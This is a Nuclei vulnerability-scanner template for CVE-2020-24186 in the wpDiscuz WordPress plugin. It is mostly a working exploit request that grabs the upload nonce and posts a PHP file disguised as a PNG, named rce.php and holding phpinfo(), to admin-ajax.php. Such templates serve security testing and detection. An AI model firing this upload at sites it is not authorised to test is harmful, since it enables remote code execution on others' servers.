nuclei-templates/cves/2020/CVE-2020-24186.yaml

84 lines
2.4 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2020-24186
info:
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
author: Ganofins
severity: critical
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable sites server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
tags: cve,cve2020,wordpress,wp-plugin,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2020-24186
cwe-id: CWE-434
requests:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin: {{BaseURL}}
Referer: {{BaseURL}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="action"
wmuUploadFiles
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_nonce"
{{wmuSecurity}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmuAttachmentsData"
undefined
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
Content-Type: image/png
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
<?php phpinfo();?>
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="postId"
1
------WebKitFormBoundary88AhjLimsDMHU1Ak--
extractors:
- type: regex
part: body
internal: true
name: wmuSecurity
group: 1
regex:
- 'wmuSecurity":"([a-z0-9]+)'
- type: regex
part: body
group: 1
regex:
- '"url":"([a-z:\\/0-9-.]+)"'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'success":true'
- 'fullname'
- 'shortname'
- 'url'
condition: and
part: body